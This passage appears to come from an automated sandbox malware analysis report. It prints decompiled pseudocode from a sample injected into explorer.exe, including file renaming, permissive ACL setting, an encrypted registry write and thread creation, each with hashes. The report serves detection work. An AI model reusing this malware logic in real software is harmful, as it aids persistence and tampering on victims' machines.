                  • GetLastError.KERNEL32 ref: 0008A495
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ErrorLast$CreateMutex
                  • String ID:
                  • API String ID: 200418032-0
                  • Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                  • Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
                  • Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                  • Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00086DA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00086DA0(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0x9e778; // 0xe7fc18
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E00089ED0(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0x9e78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0x9e688; // 0xb0000
						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
						 *0x9e78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0x9e688; // 0xb0000
					_push(L"\\c");
					_t9 = E000892E5(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0x9e688; // 0xb0000
							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E0008B269(_t59) == 0) {
								_t32 = E0008F14F(_t59, 0x1388, _t74);
							}
							E0008A4DB(_t56);
							_t41 =  *0x9e684; // 0xe7f8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E0008980C( &_v544);
								_t43 =  *0x9e778; // 0xe7fc18
								_t53 = 0x33;
								if(E00089ED0(_t43, _t53) != 0) {
									L12:
									__eflags = E00081C68(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E0008B1B1(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0x9e778; // 0xe7fc18
									_t53 = 0x12;
									_t22 = E00089ED0(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
										_push(E0008980C(0));
										E00089640( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E0008861A( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}
























                  0x00086da0
                  0x00086da6
                  0x00086dac
                  0x00086db9
                  0x00086dba
                  0x00086dbb
                  0x00086dc2
                  0x00086dc8
                  0x00086dcd
                  0x00086dcf
                  0x00086dd1
                  0x00086ddd
                  0x00086de2
                  0x00086de2
                  0x00086de7
                  0x00086de9
                  0x00086dea
                  0x00086df4
                  0x00086dfa
                  0x00086dff
                  0x00086e01
                  0x00086e04
                  0x00086e0a
                  0x00086e10
                  0x00086e10
                  0x00086e26
                  0x00086e2a
                  0x00000000
                  0x00000000
                  0x00086e39
                  0x00086e42
                  0x00086e42
                  0x00086e46
                  0x00086e4b
                  0x00086e52
                  0x00086e57
                  0x00086e5d
                  0x00086e62
                  0x00086e6a
                  0x00086e72
                  0x00086ec0
                  0x00086ec7
                  0x00086ec9
                  0x00086ecd
                  0x00000000
                  0x00086ecd
                  0x00086e74
                  0x00086e74
                  0x00086e7c
                  0x00086e7d
                  0x00086e82
                  0x00086e84
                  0x00086e96
                  0x00086ea7
                  0x00086eac
                  0x00086eb5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00086e84
                  0x00086e72
                  0x00000000
                  0x00086e57
                  0x00086ede
                  0x00086ee4
                  0x00086e0a
                  0x00086eeb

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FileMove
                  • String ID: %s.%u
                  • API String ID: 3562171763-1288070821
                  • Opcode ID: a525183aa4c469eae1840a01f978e8047c8302b96d23d5477b9ca8207e9639b5
                  • Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
                  • Opcode Fuzzy Hash: a525183aa4c469eae1840a01f978e8047c8302b96d23d5477b9ca8207e9639b5
                  • Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00082AEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E00082AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0x9e710 * 0x64;
				_t39 = 0;
				_v12 =  *0x9e710 * 0x64;
				_t16 = E00088604(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0x9e710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E00089F48(0xe); // executed
						E0008861A( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0x9e714; // 0xe7fe88
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0x9e714; // 0xe7fe88
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0x9e710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}
















                  0x00082af0
                  0x00082afa
                  0x00082afd
                  0x00082b00
                  0x00082b05
                  0x00082b07
                  0x00082b0d
                  0x00082b17
                  0x00082b1d
                  0x00082b1f
                  0x00082b24
                  0x00082b81
                  0x00082b87
                  0x00082b8b
                  0x00082b96
                  0x00000000
                  0x00082b9d
                  0x00082b26
                  0x00082b28
                  0x00082b28
                  0x00082b31
                  0x00082b35
                  0x00082b3d
                  0x00082b43
                  0x00082b43
                  0x00082b44
                  0x00082b49
                  0x00082b4d
                  0x00082b63
                  0x00082b68
                  0x00082b6e
                  0x00082b71
                  0x00082b74
                  0x00082b74
                  0x00082b76
                  0x00082b77
                  0x00082b7a
                  0x00082b7d
                  0x00000000
                  0x00082b28
                  0x00000000

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeaplstrcat
                  • String ID: %u;%u;%u
                  • API String ID: 3011335133-2973439046
                  • Opcode ID: 946761fa361e4782b62cb9bc1aa85043aca340f47d39fdfad85715e4e5e56c64
                  • Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
                  • Opcode Fuzzy Hash: 946761fa361e4782b62cb9bc1aa85043aca340f47d39fdfad85715e4e5e56c64
                  • Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008BD10, Relevance: 3.1, APIs: 2, Instructions: 149memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 59%
                  			E0008BD10() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0x9e68c; // 0xe7fab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0x9e68c; // 0xe7fab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0x9e68c; // 0xe7fab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0x9e684; // 0xe7f8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0x9e684; // 0xe7f8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0x9e688; // 0xb0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0x9e68c; // 0xe7fab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0x9e68c; // 0xe7fab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0x9e68c; // 0xe7fab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0x9e68c; // 0xe7fab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0x9e68c; // 0xe7fab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0x9e68c; // 0xe7fab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}






































                  0x0008bd1b
                  0x0008bd1e
                  0x0008bd26
                  0x0008bd2c
                  0x0008bd2f
                  0x0008bd34
                  0x0008bd3a
                  0x0008bd3b
                  0x0008bd3c
                  0x0008bd3d
                  0x0008bd3e
                  0x0008bd3f
                  0x0008bd40
                  0x0008bd41
                  0x0008bd44
                  0x0008bd47
                  0x0008bd49
                  0x0008bd4c
                  0x0008bd50
                  0x0008bd53
                  0x0008bd54
                  0x0008bd59
                  0x0008bd60
                  0x0008be54
                  0x0008be58
                  0x0008be5a
                  0x0008be62
                  0x0008be62
                  0x0008be69
                  0x0008be6b
                  0x0008be73
                  0x0008be73
                  0x0008be78
                  0x0008be7a
                  0x0008be80
                  0x0008be80
                  0x0008be87
                  0x0008be89
                  0x0008be91
                  0x0008be91
                  0x0008be95
                  0x0008be9a
                  0x0008be9a
                  0x0008bd6b
                  0x0008bd6e
                  0x0008bd75
                  0x0008bd76
                  0x0008bd7d
                  0x0008bd80
                  0x0008bd87
                  0x0008bd8a
                  0x0008bd95
                  0x0008bda0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008bda2
                  0x0008bda2
                  0x0008bda5
                  0x0008bda6
                  0x0008bda7
                  0x0008bda8
                  0x0008bda9
                  0x0008bdaa
                  0x0008bdab
                  0x0008bdac
                  0x0008bdae
                  0x0008bdaf
                  0x0008bdb3
                  0x0008bdb4
                  0x0008bdbe
                  0x00000000
                  0x0008bdc4
                  0x0008bdc4
                  0x0008bdc9
                  0x0008bdcb
                  0x0008bdcd
                  0x0008bdce
                  0x0008bdd5
                  0x0008bdd8
                  0x0008bddf
                  0x0008bde2
                  0x0008bde5
                  0x0008bde5
                  0x0008bde8
                  0x0008bdeb
                  0x0008bdec
                  0x0008bdf0
                  0x0008bdf1
                  0x0008bdf6
                  0x0008bdfc
                  0x00000000
                  0x00000000
                  0x0008be08
                  0x0008be0c
                  0x00000000
                  0x00000000
                  0x0008be0e
                  0x0008be14
                  0x0008be16
                  0x0008be1f
                  0x00000000
                  0x00000000
                  0x0008be21
                  0x0008be26
                  0x0008be27
                  0x0008be2a
                  0x0008be2c
                  0x0008be35
                  0x00000000
                  0x00000000
                  0x0008be3a
                  0x0008be3c
                  0x0008be44
                  0x0008be44
                  0x0008be47
                  0x0008be4f
                  0x00000000
                  0x0008be4f
                  0x0008bdbe

                  APIs
                  • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocEntriesLocal
                  • String ID:
                  • API String ID: 2146116654-0
                  • Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                  • Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
                  • Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                  • Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A0AB, Relevance: 3.1, APIs: 2, Instructions: 146registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				intOrPtr _t84;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E0008D400( &_v12, _t103);
					_t93 = _t107 + __edx;
					E00092301(_t107 + __edx,  &_v2832);
					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E00088604(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000886E1(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E000922D3( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E0008F490( &_v16, _t104);
						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
						E0008EB2E(_t106, _v20,  &_v328);
						_t73 = E00089B0E(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E000897A0(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								_t84 =  *0x9e68c; // 0xe7fab8
								 *((intOrPtr*)(_t84 + 0x1c))(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E0008861A( &_v12, 0xffffffff);
						}
						E0008861A( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}




























                  0x0008a0b8
                  0x0008a0bd
                  0x0008a0bf
                  0x0008a0c2
                  0x0008a231
                  0x0008a231
                  0x0008a231
                  0x00000000
                  0x0008a0d2
                  0x0008a0d2
                  0x0008a0d4
                  0x00000000
                  0x00000000
                  0x0008a0da
                  0x0008a0e3
                  0x0008a0e6
                  0x0008a0e7
                  0x0008a0ef
                  0x0008a0f2
                  0x0008a0fd
                  0x0008a10d
                  0x0008a112
                  0x0008a115
                  0x0008a11e
                  0x0008a126
                  0x0008a12b
                  0x0008a130
                  0x0008a13d
                  0x0008a13f
                  0x0008a146
                  0x0008a14b
                  0x0008a14e
                  0x0008a156
                  0x0008a163
                  0x0008a168
                  0x0008a16e
                  0x0008a177
                  0x0008a17d
                  0x0008a180
                  0x0008a181
                  0x0008a193
                  0x0008a1a3
                  0x0008a1af
                  0x0008a1b4
                  0x0008a1b7
                  0x0008a1b9
                  0x0008a1c3
                  0x0008a1de
                  0x0008a1e1
                  0x0008a1e3
                  0x0008a1fe
                  0x0008a201
                  0x0008a203
                  0x0008a205
                  0x0008a207
                  0x0008a207
                  0x0008a208
                  0x0008a210
                  0x0008a1e5
                  0x0008a1e5
                  0x0008a1e7
                  0x0008a1e7
                  0x0008a219
                  0x0008a21f
                  0x0008a226
                  0x00000000
                  0x0008a22d
                  0x0008a134
                  0x00000000
                  0x0008a134

                  APIs
                    • Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeapOpen_ftol2_sse
                  • String ID:
                  • API String ID: 3756893521-0
                  • Opcode ID: 8fae462dafa039357b5de8ecdcc521ea70c86f379729c64d31f576329faea8f7
                  • Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
                  • Opcode Fuzzy Hash: 8fae462dafa039357b5de8ecdcc521ea70c86f379729c64d31f576329faea8f7
                  • Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000898EE, Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0x9e76c; // 0x1cc
				_t73 = 0;
				if(E0008A4BF(_t77, 0x7530) >= 0) {
					_t45 =  *0x9e770; // 0xe7aac0
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0x9e770; // 0xe7aac0
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0x9e770; // 0xe7aac0
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0x9e770; // 0xe7aac0
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E0008A471(0, 1);
									_t82 =  *0x9e770; // 0xe7aac0
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0x9e770; // 0xe7aac0
									_t30 = _t83 + _t113 + 4; // 0xe7aac4
									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
									_t53 =  *0x9e770; // 0xe7aac0
									 *(_t113 + _t53) = _t52;
									_t54 =  *0x9e770; // 0xe7aac0
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0x9e770; // 0xe7aac0
										 *0x9e774 =  *0x9e774 + 1;
										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0x9e770; // 0xe7aac0
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0x9e684; // 0xe7f8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0x9e770; // 0xe7aac0
										_t37 = _t61 + 0xc; // 0xe7aacc
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0x9e770; // 0xe7aac0
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0x9e76c; // 0x1cc
									E0008A4DB(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E00088604(_t110);
								_t97 =  *0x9e770; // 0xe7aac0
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0x9e770; // 0xe7aac0
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0x9e770; // 0xe7aac0
								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0x9e684; // 0xe7f8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0x9e770; // 0xe7aac0
							goto L7;
						}
						_t98 =  *0x9e770; // 0xe7aac0
						E0008984A(_t106 + _t98, 0);
						_t45 =  *0x9e770; // 0xe7aac0
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}





































                  0x000898f1
                  0x000898f2
                  0x000898f3
                  0x000898fb
                  0x000898fe
                  0x00089905
                  0x0008990e
                  0x00089917
                  0x0008991e
                  0x00089920
                  0x00089922
                  0x00089922
                  0x00089927
                  0x0008994f
                  0x00089952
                  0x0008996c
                  0x00089972
                  0x000899b2
                  0x000899b6
                  0x000899bb
                  0x000899bf
                  0x000899bf
                  0x000899cb
                  0x000899cf
                  0x000899d7
                  0x000899dd
                  0x000899e2
                  0x000899e8
                  0x000899ec
                  0x000899f4
                  0x00089a06
                  0x00089a0b
                  0x00089a10
                  0x00089a13
                  0x00089a18
                  0x00089a1d
                  0x00089a59
                  0x00089a5f
                  0x00089a65
                  0x00089a6f
                  0x00089a74
                  0x00089a7a
                  0x00089a1f
                  0x00089a23
                  0x00089a28
                  0x00089a2b
                  0x00089a30
                  0x00089a33
                  0x00089a37
                  0x00089a3e
                  0x00089a43
                  0x00089a49
                  0x00089a51
                  0x00089a52
                  0x00089a52
                  0x00089a7c
                  0x00089a7c
                  0x00089a82
                  0x00089a88
                  0x00089a8b
                  0x00089a8d
                  0x00089a8d
                  0x00089974
                  0x00089978
                  0x0008997e
                  0x00089984
                  0x00089988
                  0x00089991
                  0x00000000
                  0x00000000
                  0x00089997
                  0x0008999b
                  0x000899a8
                  0x000899ad
                  0x00000000
                  0x000899ad
                  0x00000000
                  0x00089952
                  0x00089929
                  0x0008992e
                  0x0008992f
                  0x00089938
                  0x00089965
                  0x00000000
                  0x00089965
                  0x0008993a
                  0x00089945
                  0x0008994a
                  0x00000000
                  0x00089954
                  0x00089954
                  0x00089957
                  0x00089958
                  0x00000000
                  0x00089960
                  0x00089910
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 69a52a97fa06ec0ebfc4b2f853e0b20ccf40f5a3777bb8dbbbb77bd88de68a89
                  • Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
                  • Opcode Fuzzy Hash: 69a52a97fa06ec0ebfc4b2f853e0b20ccf40f5a3777bb8dbbbb77bd88de68a89
                  • Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A6A9, Relevance: 3.1, APIs: 2, Instructions: 90fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 27%
                  			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t34;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E0008A63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0x9e684; // 0xe7f8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
